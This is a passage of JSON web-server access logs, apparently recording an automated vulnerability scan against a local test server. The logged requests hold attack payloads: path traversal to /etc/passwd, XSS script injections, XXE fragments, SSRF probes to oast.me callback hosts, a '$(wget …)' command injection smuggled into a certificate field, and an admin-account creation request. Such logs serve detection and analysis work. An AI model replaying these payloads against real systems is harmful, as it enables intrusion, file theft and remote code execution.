Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager?type=Files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/index.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://ca27l3osmpvb3nig07h0xsf4n1y4q3p8y.oast.me)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /labkey/__r1/login-login.view?returnUrl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?u=http://ca27l3osmpvb3nig07h0kwg5ominx1fp7.oast.me/&href=http://ca27l3osmpvb3nig07h0z7ur3rqkcuzbi.oast.me/&action=http://ca27l3osmpvb3nig07h0o88imbha8ggky.oast.me/&host=ca27l3osmpvb3nig07h0qxeinp7yfbj99.oast.me&http_host=ca27l3osmpvb3nig07h0xx1c7ccjjtriq.oast.me&email=root@ca27l3osmpvb3nig07h01syxy6k6q1kde.oast.me&url=http://ca27l3osmpvb3nig07h0rdzytjs11qd8y.oast.me/&load=http://ca27l3osmpvb3nig07h0xgz6cybd7i3kk.oast.me/&preview=http://ca27l3osmpvb3nig07h0qx1s84n5kwapf.oast.me/&target=http://ca27l3osmpvb3nig07h0849f6msia1tub.oast.me/&proxy=http://ca27l3osmpvb3nig07h0aunbwdumhi3fg.oast.me/&from=http://ca27l3osmpvb3nig07h0d51zf9u1fikmr.oast.me/&src=http://ca27l3osmpvb3nig07h0mfmp9cqxauinj.oast.me/&ref=http://ca27l3osmpvb3nig07h0z9xrkytamk6xp.oast.me/&referrer=http://ca27l3osmpvb3nig07h0p9b5cd5nx6ife.oast.me/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"c\x02\x00H\x00\x04","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/.;/services/LogService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"https://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRAuth/app/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-resources/restservices/v2/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=9mGSy7&adminpassword=E31HSf&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.xhtml?faces-redirect=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert(%2729K9NKkRi2EFAgIfgLHMZ9NZeK9%27)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/user/values.xml?var=STATUS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 